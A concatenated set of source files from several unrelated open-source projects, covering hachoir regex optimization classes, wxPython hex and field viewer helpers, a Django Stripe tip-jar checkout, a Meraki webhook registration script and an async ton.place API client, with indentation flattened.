def _or_(self, other, reverse):
"""
>>> createRange("a") | createRange("b")
<RegexRange '[ab]'>
>>> createRange("a", "b", exclude=True) | createRange("a", "c", exclude=True)
<RegexRange '[^a-c]'>
"""
if not self.exclude and other.__class__ == RegexString and len(other.text) == 1:
branges = (RegexRangeCharacter(other.text),)
elif other.__class__ == RegexRange and self.exclude == other.exclude:
branges = other.ranges
else:
return None
ranges = list(self.ranges)
for itemb in branges:
RegexRange.rangeAdd(ranges, itemb)
return RegexRange(ranges, self.exclude, optimize=False)
def _str(self, **kw):
content = [str(item) for item in self.ranges]
if "-" in content:
content.remove("-")
suffix = "-"
else:
suffix = ""
if "]" in content:
content.remove("]")
prefix = "]"
else:
prefix = ""
text = prefix + (''.join(content)) + suffix
if self.exclude:
return "[^%s]" % text
else:
return "[%s]" % text
def _eq(self, other):
if self.exclude != other.exclude:
return False
return self.ranges == other.ranges
class RegexAnd(Regex):
def __init__(self, items):
self.content = list(items)
assert 2 <= len(self.content)
def _minmaxLength(self, lengths):
total = 0
for length in lengths:
if length is None:
return None
total += length
return total
def minLength(self):
"""
>>> regex=((RegexString('a') | RegexString('bcd')) + RegexString('z'))
>>> regex.minLength()
2
"""
return self._minmaxLength(regex.minLength() for regex in self.content)
def maxLength(self):
"""
>>> regex=RegexOr((RegexString('a'), RegexString('bcd')))
>>> RegexAnd((regex, RegexString('z'))).maxLength()
4
"""
return self._minmaxLength(regex.maxLength() for regex in self.content)
def _or_(self, other, reverse):
if other.__class__ == RegexString:
contentb = [other]
elif other.__class__ == RegexAnd:
contentb = other.content
else:
return None
contenta = self.content
if reverse:
contenta, contentb = contentb, contenta
# Find common prefix
# eg. (ab|ac) => a(b|c) and (abc|abd) => ab(c|d)
index = 0
last_index = min(len(contenta), len(contentb))
while index < last_index and contenta[index] == contentb[index]:
index += 1
if index:
regex = RegexAnd.join(
contenta[index:]) | RegexAnd.join(contentb[index:])
return RegexAnd.join(contenta[:index]) + regex
# Find common prefix: (abc|aef) => a(bc|ef)
common = contenta[0].findPrefix(contentb[0])
if common:
regexa = common[1] & RegexAnd.join(contenta[1:])
regexb = common[2] & RegexAnd.join(contentb[1:])
regex = (regexa | regexb)
if matchSingleValue(common[0]) or matchSingleValue(regex):
return common[0] + regex
return None
def _and(self, regex):
"""
>>> RegexDot() + RegexDot()
<RegexAnd '..'>
>>> RegexDot() + RegexString('a') + RegexString('b')
<RegexAnd '.ab'>
"""
if regex.__class__ == RegexAnd:
total = self
for item in regex.content:
total = total + item
return total
new_item = self.content[-1]._and(regex)
if new_item:
self.content[-1] = new_item
return self
return RegexAnd(self.content + [regex])
def _str(self, **kw):
return ''.join(item.__str__(**kw) for item in self.content)
@classmethod
def join(cls, regex):
"""
>>> RegexAnd.join( (RegexString('Big '), RegexString('fish')) )
<RegexString 'Big fish'>
"""
return _join(operator.__and__, regex)
def __iter__(self):
return iter(self.content)
def _eq(self, other):
if len(self.content) != len(other.content):
return False
return all(item[0] == item[1] for item in zip(self.content, other.content))
class RegexOr(Regex):
def __init__(self, items, optimize=True):
if optimize:
self.content = []
for item in items:
if item in self:
continue
self.content.append(item)
else:
self.content = tuple(items)
assert 2 <= len(self.content)
def __contains__(self, regex):
for item in self.content:
if item == regex:
return True
return False
def _or_(self, other, reverse):
"""
>>> (RegexString("abc") | RegexString("123")) | (RegexString("plop") | RegexString("456"))
<RegexOr '(abc|123|plop|456)'>
>>> RegexString("mouse") | createRange('a') | RegexString("2006") | createRange('z')
<RegexOr '(mouse|[az]|2006)'>
"""
if other.__class__ == RegexOr:
total = self
for item in other.content:
total = total | item
return total
for index, item in enumerate(self.content):
new_item = item.or_(other)
if new_item:
content = list(self.content)
content = content[:index] + [new_item] + content[index + 1:]
return RegexOr(content, optimize=False)
if not reverse:
content = list(self.content) + [other]
else:
content = [other] + list(self.content)
return RegexOr(content, optimize=False)
def _str(self, **kw):
content = '|'.join(item.__str__(**kw) for item in self.content)
if kw.get('python', False):
return "(?:%s)" % content
else:
return "(%s)" % content
def _minmaxLength(self, lengths, func):
value = None
for length in lengths:
if length is None:
return None
if value is None:
value = length
else:
value = func(value, length)
return value
def minLength(self):
lengths = (regex.minLength() for regex in self.content)
return self._minmaxLength(lengths, min)
def maxLength(self):
lengths = (regex.maxLength() for regex in self.content)
return self._minmaxLength(lengths, max)
@classmethod
def join(cls, regex):
"""
>>> RegexOr.join( (RegexString('a'), RegexString('b'), RegexString('c')) )
<RegexRange '[a-c]'>
"""
return _join(operator.__or__, regex)
def __iter__(self):
return iter(self.content)
def _eq(self, other):
if len(self.content) != len(other.content):
return False
return all(item[0] == item[1] for item in zip(self.content, other.content))
def optimizeRepeatOr(rmin, rmax, regex):
# Fix rmin/rmax
for item in regex:
cls = item.__class__
if cls == RegexEmpty:
# (a|b|){x,y} => (a|b){0,y}
rmin = 0
elif cls == RegexRepeat:
# (a{0,n}|b){x,y} => (a{1,n}|b){0,y}
if item.min == 0 and rmin == 1:
rmin = 0
# Create new (optimized) RegexOr expression
content = []
for item in regex:
cls = item.__class__
if cls == RegexEmpty:
# (a|){x,y} => a{0,y}
continue
if cls == RegexRepeat:
if item.min == 0:
if rmin in (0, 1):
if rmax is item.max is None:
# (a*|b){x,} => (a|b){x,}
item = item.regex
else:
# (a{0,p}|b){x,} => (a{1,p}|b){x,}
item = RegexRepeat(
item.regex, 1, item.max, optimize=False)
elif item.min == 1:
if rmax is item.max is None:
# (a+|b){x,} => (a|b){x,}
item = item.regex
else:
if rmax is item.max is None:
# (a{n,}|b){x,} => (a{n}|b){x,}
item = RegexRepeat(item.regex, item.min,
item.min, optimize=False)
content.append(item)
regex = RegexOr.join(content)
return (rmin, rmax, regex)
class RegexRepeat(Regex):
"""
>>> a=createString('a')
>>> RegexRepeat(a, 0, None)
<RegexRepeat 'a*'>
>>> RegexRepeat(a, 1, None)
<RegexRepeat 'a+'>
>>> RegexRepeat(a, 0, 1)
<RegexRepeat 'a?'>
>>> RegexRepeat(a, 0, 1)
<RegexRepeat 'a?'>
>>> RegexRepeat(a, 1, 3)
<RegexRepeat 'a{1,3}'>
"""
def __init__(self, regex, rmin, rmax, optimize=True):
# Optimisations
if optimize:
cls = regex.__class__
if cls == RegexRepeat:
# (a{n,p}){x,y) => a{n*x,p*y}
if not (rmin == 0 and rmax == 1):
rmin *= regex.min
if regex.max and rmax:
rmax *= regex.max
else:
rmax = None
regex = regex.regex
elif cls == RegexOr:
rmin, rmax, regex = optimizeRepeatOr(rmin, rmax, regex)
# Store attributes
self.regex = regex
self.min = rmin
self.max = rmax
# Post-conditions
assert 0 <= rmin
if self.max is not None:
if self.max < self.min:
raise ValueError(
"RegexRepeat: minimum (%s) is bigger than maximum (%s)!" % (self.min, self.max))
if (self.max == 0) \
or (self.min == self.max == 1):
raise ValueError(
"RegexRepeat: invalid values (min=%s, max=%s)!" % (self.min, self.max))
def minLength(self):
"""
>>> r=RegexRepeat(createString("abc") | createString("01"), 1, 3)
>>> r.minLength(), r.maxLength()
(2, 9)
>>> r=RegexRepeat(createString("abc") | createString("01"), 4, None)
>>> r.minLength(), r.maxLength()
(8, None)
"""
if self.min is not None:
return self.regex.minLength() * self.min
else:
return None
def maxLength(self):
if self.max is not None:
return self.regex.maxLength() * self.max
else:
return None
def _str(self, **kw):
text = str(self.regex)
if self.regex.__class__ == RegexAnd \
or (self.regex.__class__ == RegexString and 1 < len(self.regex.text)):
text = "(%s)" % text
if self.min == 0 and self.max == 1:
return "%s?" % text
if self.min == self.max:
return "%s{%u}" % (text, self.min)
if self.max is None:
if self.min == 0:
return "%s*" % text
elif self.min == 1:
return "%s+" % text
else:
return "%s{%u,}" % (text, self.min)
return "%s{%u,%u}" % (text, self.min, self.max)
def _eq(self, other):
if self.min != other.min:
return False
if self.max != other.max:
return False
return (self.regex == other.regex)
if __name__ == "__main__":
import doctest
doctest.testmod()
```
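A short sketch of the optimizations these classes perform — assuming the module is importable as `hachoir.regex.regex` (the import path is inferred from the file header above):
```python
# Hedged sketch: the overloaded operators fold strings, share common
# prefixes, and merge adjacent character ranges automatically.
from hachoir.regex.regex import createString, createRange, RegexRepeat

pattern = createString("color ") + (createString("red") | createString("blue"))
print(pattern)   # color (red|blue)

digits = RegexRepeat(createRange(*"0123456789"), 1, None)
print(digits)    # [0-9]+
print(bool(digits.compile().match("42")))
```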
#### File: hachoir/wx/dialogs.py
```python
import wx
import os
def file_open_dialog():
dialog_style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
dialog = wx.FileDialog(
None, message='Open',
defaultDir=os.getcwd(),
defaultFile='', style=dialog_style)
return dialog
def file_save_dialog(title):
dialog_style = wx.FD_SAVE
dialog = wx.FileDialog(
None, message=title,
defaultDir=os.getcwd(),
defaultFile='', style=dialog_style)
return dialog
```
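A minimal caller sketch — these helpers only build the dialog; showing it modally and reading the path is up to the caller (assumes the helpers above are importable):
```python
# Hedged sketch: a wx.App must exist before any dialog is created.
import wx

app = wx.App(False)
dlg = file_open_dialog()
if dlg.ShowModal() == wx.ID_OK:
    print("selected:", dlg.GetPath())
dlg.Destroy()
```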
#### File: wx/field_view/field_split_menu_imp.py
```python
from hachoir.field import RawBytes, RawBits
class field_split_menu_imp_t:
def on_field_split_menu_ready(self, dispatcher, view):
assert view is not None
self.view = view
def on_field_selected(self, dispatcher, field):
self.field = field
def on_split_bytes(self):
if self.split_field('Split Bytes...', self.field, RawBytes, lambda field: field._getSize() // 8):
self.dispatcher.trigger('field_was_split_bytes', self.field)
def on_split_bits(self):
if self.split_field('Split Bits...', self.field, RawBits, lambda field: field._getSize()):
self.dispatcher.trigger('field_was_split_bits', self.field)
def split_field(self, caption, field, split_type, size_func):
offset = self.view.ask_split(caption, 1, size_func(field) - 1)
# FIXME: code commented because of pep8 warning
# if offset is not None:
# new_fields = split_field(field, offset, field._getName(), split_type, size_func)
return offset
```
#### File: wx/field_view/field_view.py
```python
from wx import ListCtrl, EVT_WINDOW_CREATE, CallAfter
from wx.lib.mixins.listctrl import ListCtrlAutoWidthMixin
class field_view_t(ListCtrl, ListCtrlAutoWidthMixin):
def __init__(self):
self.cols = {}
ListCtrl.__init__(self)
self.Bind(EVT_WINDOW_CREATE, self.on_create)
def post_init(self):
ListCtrlAutoWidthMixin.__init__(self)
columns = ['address', 'name', 'type', 'size', 'data', 'description']
for name in columns:
self.append_column(name)
self.col_min_width = [len(s) for s in columns]
self.Layout()
self.dispatcher.trigger('field_view_ready', self)
def on_create(self, event):
self.Unbind(EVT_WINDOW_CREATE)
CallAfter(self.post_init)
def append_column(self, name):
index = self.GetColumnCount()
self.cols[name] = index
self.InsertColumn(col=index, heading=name)
def get_selected(self, name):
        # Return the focused row's value for the requested column.
        return self.GetItem(self.GetFocusedItem(), self.cols[name]).GetText()
def clear(self):
self.DeleteAllItems()
def register_callback(self, cbGetItemText):
self.OnGetItemText_imp = cbGetItemText
def OnGetItemText(self, item, col):
return self.OnGetItemText_imp(item, col)
def get_col_index(self, name):
return self.cols[name]
def get_col_count(self):
return len(self.cols)
def resize_column(self, col_index, width):
width = max(self.col_min_width[col_index], width) + 1
self.SetColumnWidth(col_index, self.GetCharWidth() * width)
```
#### File: wx/hex_view/file_cache.py
```python
from functools import lru_cache
class FileCache(object):
CHUNKSIZE = 4096
def __init__(self, file):
self.file = file
self.update_file_size()
def update_file_size(self):
pos = self.file.tell()
self.file.seek(0, 2)
self.filesize = self.file.tell()
self.file.seek(pos)
@lru_cache(maxsize=100)
def get_chunk(self, cstart):
pos = self.file.tell()
self.file.seek(cstart)
chunk = self.file.read(self.CHUNKSIZE)
self.file.seek(pos)
return chunk
def hint(self, s, e):
'''Hint that the range [s, e) may be needed soon'''
sc = s // self.CHUNKSIZE
ec = (e + self.CHUNKSIZE - 1) // self.CHUNKSIZE
for c in range(sc, ec):
self.get_chunk(c * self.CHUNKSIZE)
def get(self, s, e):
'''Obtain the file contents in the range [s, e)'''
soff = s % self.CHUNKSIZE
eoff = e % self.CHUNKSIZE
sc = s // self.CHUNKSIZE
ec = (e + self.CHUNKSIZE - 1) // self.CHUNKSIZE
out = []
for c in range(sc, ec):
out.append(self.get_chunk(c * self.CHUNKSIZE))
if eoff:
out[-1] = out[-1][:eoff]
if soff:
out[0] = out[0][soff:]
return b''.join(out)
def test():
from io import BytesIO
for blocksize in [8, 1024]:
instr = bytes(range(256))
sf = BytesIO(instr)
fc = FileCache(sf)
fc.CHUNKSIZE = blocksize
import random
random.seed(1)
for iter in range(256):
s = random.randrange(0, fc.filesize + 10)
e = random.randrange(s, fc.filesize + 10)
print("testing", s, e)
got = fc.get(s, e)
expected = instr[s:e]
assert got == expected, "Failed to get %d, %d: got %r, expected %r" % (s, e, got, expected)
if __name__ == '__main__':
test()
```
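A usage sketch mirroring the self-test above, but against a real file (the path is a placeholder):
```python
# Hedged sketch: repeated reads of the same 4 KiB chunk are served from
# the lru_cache on get_chunk.
with open("sample.bin", "rb") as fh:
    cache = FileCache(fh)
    cache.hint(0, 64)            # pre-warm the first chunk
    header = cache.get(0, 16)
    body = cache.get(8, 40)      # overlaps the already-cached chunk
    print(len(header), len(body), cache.filesize)
```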
#### File: wx/hex_view/hex_view_setup.py
```python
from hachoir.wx.resource import get_child_control
def setup_hex_view(parent, dispatcher):
print("[+] Setup hex view")
hex_view = get_child_control(parent, 'hex_view')
dispatcher.add_sender(hex_view)
dispatcher.add(hex_view)
dispatcher.add_receiver(hex_view)
return hex_view
```
#### File: hachoir/wx/main.py
```python
from hachoir.wx.app import app_t
from hachoir.version import PACKAGE, VERSION, WEBSITE
from hachoir.core.cmd_line import getHachoirOptions, configureHachoir
from optparse import OptionParser
import sys
def parseOptions():
parser = OptionParser(usage="%prog [options] [filename]")
hachoir = getHachoirOptions(parser)
parser.add_option_group(hachoir)
values, arguments = parser.parse_args()
if len(arguments) == 1:
filename = arguments[0]
elif not arguments:
filename = None
else:
parser.print_help()
sys.exit(1)
return values, filename
def main():
print("%s version %s" % (PACKAGE, VERSION))
print(WEBSITE)
print()
values, filename = parseOptions()
configureHachoir(values)
app = app_t(filename)
app.MainLoop()
if __name__ == '__main__':
main()
```
#### File: wx/resource/resource.py
```python
import os
from wx.xrc import XmlResource, XRCID
def get_resource():
filename = os.path.join(os.getcwd(), os.path.dirname(__file__), 'hachoir_wx.xrc')
return XmlResource(filename)
def get_frame(name):
return get_resource().LoadFrame(None, name)
def get_child_control(parent, child):
# We do this instead of XRCCTRL to work around a bug in wxPython 3.0.3.
# FindWindowById, FindWindowByName and XRCCTRL all seem to return the
# first-created "child" instead of the proper one; only FindWindow behaves
# as expected.
return parent.FindWindow(XRCID(child))
def get_menu_bar(name):
return get_resource().LoadMenuBar(name)
def get_menu(name):
return get_resource().LoadMenu(name)
```
#### File: lib/transmissionrpc/error.py
```python
from six import string_types, integer_types
class TransmissionError(Exception):
"""
This exception is raised when there has occurred an error related to
communication with Transmission. It is a subclass of Exception.
"""
def __init__(self, message='', original=None):
Exception.__init__(self)
self.message = message
self.original = original
def __str__(self):
if self.original:
original_name = type(self.original).__name__
return '%s Original exception: %s, "%s"' % (self.message, original_name, str(self.original))
else:
return self.message
class HTTPHandlerError(Exception):
"""
    Raised when an error occurs in the HTTP handler.
    It is a subclass of Exception.
"""
def __init__(self, httpurl=None, httpcode=None, httpmsg=None, httpheaders=None, httpdata=None):
Exception.__init__(self)
self.url = ''
self.code = 600
self.message = ''
self.headers = {}
self.data = ''
if isinstance(httpurl, string_types):
self.url = httpurl
if isinstance(httpcode, integer_types):
self.code = httpcode
if isinstance(httpmsg, string_types):
self.message = httpmsg
if isinstance(httpheaders, dict):
self.headers = httpheaders
if isinstance(httpdata, string_types):
self.data = httpdata
def __repr__(self):
return '<HTTPHandlerError %d, %s>' % (self.code, self.message)
def __str__(self):
return 'HTTPHandlerError %d: %s' % (self.code, self.message)
def __unicode__(self):
return 'HTTPHandlerError %d: %s' % (self.code, self.message)
``` |
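A small sketch of how the chained `__str__` output above behaves:
```python
# Hedged sketch: wrap a lower-level failure so the original exception is
# preserved and reported by __str__.
try:
    raise ConnectionError("connection refused")
except ConnectionError as exc:
    err = TransmissionError("failed to reach the daemon", original=exc)
    print(err)
    # failed to reach the daemon Original exception: ConnectionError, "connection refused"
```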
{
"source": "0x213F/tip-jar",
"score": 2
} |
#### File: config/views/checkout_view.py
```python
import stripe
from decimal import Decimal
from django.conf import settings
from django.contrib.auth import get_user_model
from config import utils as config_utils
from tip_jar.core.base_view import BaseView
User = get_user_model()
stripe.api_key = settings.STRIPE_API_KEY
class MusicianCheckoutView(BaseView):
def get(self, request, musician, **kwargs):
"""
By now the user has finalized their cart selection.
        - musician_amount: the initial amount pledged.
- transaction_covered: opt in to covering the transaction fees.
- total_amount: the final total bill.
- transaction_fee: how much goes to Stripe
- website_amount: how much goes to the Musician Tips Dividend.
- intent: mandatory setup for a Stripe transaction.
"""
user = User.objects.get(username=musician)
musician_amount = request.GET.get("amount")
transaction_covered = request.GET.get("transactionCovered", False) == "true"
(
total_amount,
musician_amount,
transaction_fee,
) = config_utils.get_checkout_total(
musician_amount,
transaction_covered,
)
intent = stripe.PaymentIntent.create(
amount=int(total_amount * Decimal("100")),
currency="usd",
metadata={"musician": musician},
)
return self.template_response(
request,
"pages/checkout.html",
{
"client_secret": intent["client_secret"],
"musician": user,
"total_amount": total_amount,
"musician_amount": musician_amount,
"transaction_fee": transaction_fee,
"transaction_covered": transaction_covered,
"stripe_public_key": settings.STRIPE_PUBLIC_KEY,
},
)
```
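`config_utils.get_checkout_total` is imported above but not included in this snippet; a plausible sketch follows, assuming the standard Stripe card fee of 2.9% + $0.30 — an assumption about this project, not confirmed by its source:
```python
# Hypothetical sketch of get_checkout_total. The 2.9% + $0.30 card fee and
# the gross-up formula are assumptions, not taken from this repo.
from decimal import Decimal, ROUND_HALF_UP

CENT = Decimal("0.01")

def get_checkout_total(musician_amount, transaction_covered):
    amount = Decimal(musician_amount)
    if transaction_covered:
        # Gross up so the musician still nets the full pledge after fees:
        # total = (amount + 0.30) / (1 - 0.029)
        total = ((amount + Decimal("0.30")) / (1 - Decimal("0.029"))).quantize(
            CENT, rounding=ROUND_HALF_UP)
    else:
        total = amount
    fee = (total * Decimal("0.029") + Decimal("0.30")).quantize(
        CENT, rounding=ROUND_HALF_UP)
    if not transaction_covered:
        amount = total - fee
    return total, amount, fee
```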
#### File: tip_jar/core/base_view.py
```python
from django.http import (
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
HttpResponseRedirect,
JsonResponse,
)
from django.template.response import TemplateResponse
from django.views import View
class BaseView(View):
"""
Inherits from Django View.
"""
def http_response_200(self, data=None):
"""
SUCCESS
"""
response = {
"system": {
"status": 200,
"message": "Ok",
},
}
if data:
response["data"] = data
        # `response` is always a dict at this point, so return it directly.
        return JsonResponse(response)
def http_response_400(self, message):
"""
BAD REQUEST
"""
return HttpResponseBadRequest(message)
def http_response_403(self, message):
"""
FORBIDDEN
"""
return HttpResponseForbidden(message)
def http_response_422(self, message):
"""
INVALID FORMAT
"""
        # HttpResponse takes the body as its first argument and the HTTP
        # status via `status`, not `status_code`/`message` keywords.
        return HttpResponse(message, status=422)
    def template_response(self, request, template, context=None):
        # Avoid a shared mutable default argument.
        return TemplateResponse(request, template, context or {})
def redirect_response(self, redirect_path):
return HttpResponseRedirect(redirect_path)
```
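A sketch of a concrete view built on these helpers (the endpoint itself is illustrative):
```python
# Hedged sketch: BaseView subclasses implement get/post and return the
# helper responses above.
class PingView(BaseView):
    def get(self, request, **kwargs):
        return self.http_response_200({"pong": True})

    def post(self, request, **kwargs):
        if "name" not in request.POST:
            return self.http_response_400("missing name")
        return self.http_response_200({"hello": request.POST["name"]})
```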
#### File: tip_jar/payments/models.py
```python
import pgtrigger
import uuid
from django.db import models
@pgtrigger.register(
pgtrigger.Protect(
name="append_only",
operation=(pgtrigger.Update | pgtrigger.Delete),
)
)
class Payment(models.Model):
uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, null=True, blank=True
)
amount = models.DecimalField(max_digits=6, decimal_places=2)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"[{self.user}] ${self.amount}"
class AmountChoice(models.Model):
uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, null=True, blank=True
)
amount = models.DecimalField(max_digits=4, decimal_places=0)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return f"[{self.user}] ${self.amount}"
``` |
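A sketch of what the `pgtrigger.Protect` registration buys: once the trigger is installed, updates and deletes on `Payment` fail at the database level (the shell session below is illustrative):
```python
# Hedged sketch: the append-only trigger rejects UPDATE/DELETE statements.
from tip_jar.payments.models import Payment

payment = Payment.objects.create(user=None, amount="5.00")
try:
    payment.amount = "0.01"
    payment.save()            # blocked by the Protect trigger
except Exception as exc:      # django.db.InternalError in practice
    print("update rejected:", exc)
```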
{
"source": "0x2142/meraki-discord-bot",
"score": 2
} |
#### File: 0x2142/meraki-discord-bot/meraki_register_webhook.py
```python
import json
import logging
import os
import secrets
import string
from time import sleep
import httpx
logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO"))
# Meraki settings
API_BASE_URL = "https://api.meraki.com/api/v1"
SHARED_SECRET = "".join(
(secrets.choice(string.ascii_letters + string.digits) for i in range(24))
)
class MerakiWebhook:
def __init__(self, MERAKI_API_KEY, WEBHOOK_NAME, WEBHOOK_URL, NETWORK):
"""
Pull in settings required for Meraki Dashboard API work,
then pull Org ID, Network ID, and create/update webhooks
"""
self.NETWORK = NETWORK
self.headers = {"X-Cisco-Meraki-API-Key": MERAKI_API_KEY}
self.webhook_config = {
"name": WEBHOOK_NAME,
"url": WEBHOOK_URL + "/post-msg-discord",
"sharedSecret": SHARED_SECRET,
}
logging.info("Beginning Meraki API webhook check/create/update")
self.webhookID = None
        # Keep the client open: update_webhook_url() reuses it after
        # __init__, so a context manager (which would close it) breaks that.
        self.http_client = httpx.Client()
        self.get_org_id()
        self.get_network_id()
        self.get_current_webhooks()
        if self.webhook_exists:
            self.update_existing_webhook()
        else:
            self.create_new_webhook()
def get_org_id(self):
"""
Query Meraki API for which Organizations we have access to & return Org ID
"""
url = API_BASE_URL + "/organizations"
try:
response = self.http_client.get(url, headers=self.headers)
except httpx.ReadTimeout:
            logging.exception("Error: Timed out trying to get Org ID")
            raise
orgID = json.loads(response.text)[0]["id"]
logging.info(f"Using Org ID: {orgID}")
self.orgID = orgID
def get_network_id(self):
"""
Use Organization ID to pull list of networks we have access to
"""
url = API_BASE_URL + f"/organizations/{self.orgID}/networks"
response = self.http_client.get(url, headers=self.headers)
data = json.loads(response.text)
logging.info(f"Got Network list, searching for network: {self.NETWORK}")
for network in data:
if network["name"] == self.NETWORK:
self.networkID = network["id"]
logging.info(f"Found Network: {self.NETWORK}, ID: {self.networkID}")
return
    def get_current_webhooks(self):
"""
Query list of all current configured webhooks
"""
url = API_BASE_URL + f"/networks/{self.networkID}/webhooks/httpServers"
response = self.http_client.get(url, headers=self.headers)
if response.status_code == 200:
self.current_webhooks = json.loads(response.text)
logging.info(f"Found {len(self.current_webhooks)} existing webhooks")
self.webhook_exists = False
if len(self.current_webhooks) >= 1:
logging.info("Checking if we own any of the existing webhooks....")
for config_item in self.current_webhooks:
if config_item["name"] == self.webhook_config["name"]:
self.webhookID = config_item["id"]
logging.info(f"Found existing webhook ID: {self.webhookID}")
self.webhook_exists = True
def create_new_webhook(self):
"""
Create new webhook config, if it doesn't already exist
"""
url = API_BASE_URL + f"/networks/{self.networkID}/webhooks/httpServers"
logging.info("Attempting to create new webhook config")
response = self.http_client.post(
url, json=self.webhook_config, headers=self.headers
)
if response.status_code == 201:
logging.info("Successfully created new Meraki webhook")
return
else:
logging.error("Failed to update webhook. Error:")
logging.error(f"Status code: {response.status_code}")
logging.error(f"Message: {response.text}")
def update_existing_webhook(self):
"""
Locate existing webhook ID created by this automation,
then update with any new parameters
"""
url = (
API_BASE_URL
+ f"/networks/{self.networkID}/webhooks/httpServers/{self.webhookID}"
)
logging.info(f"Updating existing webhook with ID: {self.webhookID}")
attempt = 1
while attempt <= 3:
logging.info("Sending PUT to update webhook...")
response = self.http_client.put(
url, json=self.webhook_config, headers=self.headers
)
if response.status_code == 200:
logging.info("Successfully updated webhook with new config")
return
else:
logging.error("Failed to update webhook. Error:")
logging.error(f"Status code: {response.status_code}")
logging.error(f"Message: {response.text}")
logging.error(f"Attempt {attempt} of 3... retrying...")
sleep(2)
attempt += 1
logging.error("Failed to update Meraki webhook.")
def update_webhook_url(self, url):
"""
Update self config for webhook URL
"""
logging.info(f"Got request to update Meraki target webhook URL to: {url}")
self.webhook_config["url"] = url + "/post-msg-discord"
if not self.webhookID:
            self.get_current_webhooks()
self.update_existing_webhook()
``` |
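A startup sketch; all four values are placeholders, with the API key read from the environment:
```python
# Hedged sketch: create (or refresh) the Meraki webhook at bot startup.
import os

webhook = MerakiWebhook(
    MERAKI_API_KEY=os.environ["MERAKI_API_KEY"],
    WEBHOOK_NAME="discord-bot",
    WEBHOOK_URL="https://bot.example.com",
    NETWORK="Home Office",
)
# Later, e.g. when the public tunnel URL changes:
webhook.update_webhook_url("https://new-tunnel.example.com")
```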
{
"source": "0x216/tonplace-api",
"score": 2
} |
#### File: tonplace-api/tonplace/api.py
```python
import io
import json
from aiohttp import ClientSession
from typing import Any, Union, Optional
from loguru import logger
import aiohttp
from .errors import TonPlaceError
from aiohttp_socks import ProxyConnector
from tonplace.attachments import Attachments
BASE_API = "https://api.ton.place/"
class API:
def __init__(self,
token: str,
proxy: Optional[str] = None):
self.base_path = BASE_API
self.token = token.strip('\n')
self.proxy = proxy
self.connector = None
self.headers = {
"Host": "api.ton.place",
"User-Agent": " Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en",
"Accept-Encoding": "gzip, deflate, br",
"Origin": "https://ton.place",
"Referer": "https://ton.place/",
"Content-Type": "application/json",
"Accept-Language": "en-US,en;q=0.5",
"Authorization": self.token,
}
if self.proxy:
self.connector = ProxyConnector.from_url(self.proxy)
self.session = ClientSession(headers=self.headers,
connector=self.connector)
async def request(
self,
method: str,
path: str,
data: Optional[Any] = None,
json_data: Optional[dict] = None,
):
response = await self.session.request(
method=method,
            url=BASE_API + path,
data=data,
json=json_data,
)
if response.status >= 500:
logger.error(f"Error {response.status}")
raise TonPlaceError('Site is down')
try:
json_response = json.loads(await response.text())
except json.JSONDecodeError:
raise TonPlaceError(await response.text())
if isinstance(json_response, str):
return json_response
if json_response.get("code") == "fatal":
#if self.return_error:
return await response.text()
raise TonPlaceError(
f"Request error - {json_response.get('message')}"
)
return json_response
async def get_me(self):
"""
Info about yourself
"""
user = await self.request("POST", path="main/init")
return user
async def get_user(self, user_id: int):
"""
User info
:param user_id:
:return:
"""
user = await self.request("POST", path=f"profile/{user_id}")
return user
async def get_group(self, group_id: int):
"""
Group info
:param group_id:
:return:
"""
user = await self.request("POST", path=f"group/{group_id}")
return user
async def search(
self,
tab: str,
sort: str = "popular",
query: str = "",
city: int = 0,
start_from: int = 0,
):
"""
Search (return 30 elements)
:param tab: explore|peoples|groups
:param sort: popular|new|online
:param query: search query
:param start_from: offset
:param city: default zero
:return:
"""
result = await self.request(
"POST",
path=f"search",
json_data={
"query": query,
"startFrom": start_from,
"tab": tab,
"sort": sort,
"city": city,
},
)
return result
async def follow(self, user_id: int):
result = await self.request(
"POST",
path=f"follow/{user_id}/add",
)
return result
async def unfollow(self, user_id: int):
result = await self.request(
"POST",
path=f"follow/{user_id}/del",
)
return result
async def like(self, post_id: int):
result = await self.request(
"POST",
path=f"likes/{post_id}/post/add",
)
return result
async def unlike(self, post_id: int):
result = await self.request(
"POST",
path=f"likes/{post_id}/post/del",
)
return result
async def write_comment(
self,
post_id: int,
text: str = "",
attachments: Optional[list] = None,
reply: Optional[int] = 0,
group_id: Optional[int] = 0,
):
"""
:param post_id:
:param text:
:param attachments:
:param reply:
:param group_id:
:return:
"""
if attachments is None:
attachments = []
if isinstance(attachments, Attachments):
attachments = attachments.get_attachments()
result = await self.request(
"POST",
path=f"posts/new",
json_data={
"parentId": post_id,
"replyTo": reply,
"text": text,
"attachments": attachments,
"groupId": group_id,
},
)
return result
async def read_post(self, post_id: int):
"""
Increase views of post
:param post_id:
:return:
"""
result = await self.read_posts([post_id])
return result
async def read_posts(self, post_ids: list[int]):
"""
Increase views of posts
:param post_ids:
:return:
"""
result = await self.request(
"POST",
path=f"posts/read",
json_data={
"posts": post_ids,
},
)
return result
async def get_post(self, post_id: int):
# TODO: next from comments
result = await self.request(
"GET",
path=f"posts/{post_id}",
)
return result
async def get_feed(
self, section: str, start_from: int = 0, suggestions: Optional[bool] = None
):
"""
Get Feed
        :param section: following|suggestions|liked
:param start_from: - offset
:param suggestions:
:return:
"""
if suggestions is None and section != "suggestions":
suggestions = False
result = await self.request(
"POST",
path=f"feed",
json_data={
"section": section,
"startFrom": start_from,
"suggestions": suggestions,
},
)
return result
async def get_dialogs(self):
result = await self.request(
"GET",
path=f"im",
)
return result
async def get_notify(self):
result = await self.request(
"GET",
path=f"notify",
)
return result
async def get_owned_groups(self):
result = await self.request(
"GET",
path=f"groups",
)
return result
async def get_balance(self):
result = await self.request(
"GET",
path=f"balance",
)
return result
async def send_ton(self, address: str, amount: float):
result = await self.request(
"POST",
path=f"balance/withdraw",
json_data={
"address": address,
"amount": amount,
},
)
return result
async def create_post(
self,
owner_id: int,
text: str = "",
parent_id: int = 0,
timer: int = 0,
